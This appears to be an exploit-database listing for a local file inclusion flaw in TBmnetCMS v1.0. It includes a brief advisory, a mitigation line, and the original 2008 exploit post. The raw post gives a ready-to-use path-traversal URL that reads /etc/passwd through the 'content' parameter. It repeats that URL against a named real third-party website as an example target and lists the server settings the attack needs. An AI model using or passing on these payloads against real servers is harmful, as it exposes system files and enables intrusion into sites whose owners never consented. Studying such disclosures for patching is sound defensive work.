header-logo
Suggest Exploit
vendor:
TBmnetCMS
by:
d3v1l [Avram Marius]
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: TBmnetCMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TBmnetCMS v1.0 (index.php?content) Local File Inclusion Vulnerability

TBmnetCMS v1.0 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to view sensitive files on the server, such as the /etc/passwd file. The vulnerability is due to the application not properly sanitizing user-supplied input to the 'content' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to view sensitive files on the server, such as the /etc/passwd file.

Mitigation:

The application should properly sanitize user-supplied input to the 'content' parameter of the 'index.php' script.
Source

Exploit-DB raw data:

[~]-------------------------------------------------------------------------------------------------------------
[~] TBmnetCMS v1.0 (index.php?content) Local File Inclusion Vulnerability
[~]
[~] http://www.tbmnet.de
[~]  
[~] 
[~] ------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 3.11.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~] ------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] milw0rm staff
[~]-------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/index.php?content=../../../../../../../../../../../../../../etc/passwd%00
[~]  
[~] Ex :-

[~] http://www.valtellinux.it/meeting/index.php?content=../../../../../../../../../../../../../../etc/passwd%00
[~]----------------------------------------------------------------------------------------------------------------------
[~] NEED:- magic_quotes=OFF
[~]
[~] NEED:- disable_functions=ini_set 
[~]----------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-11-04]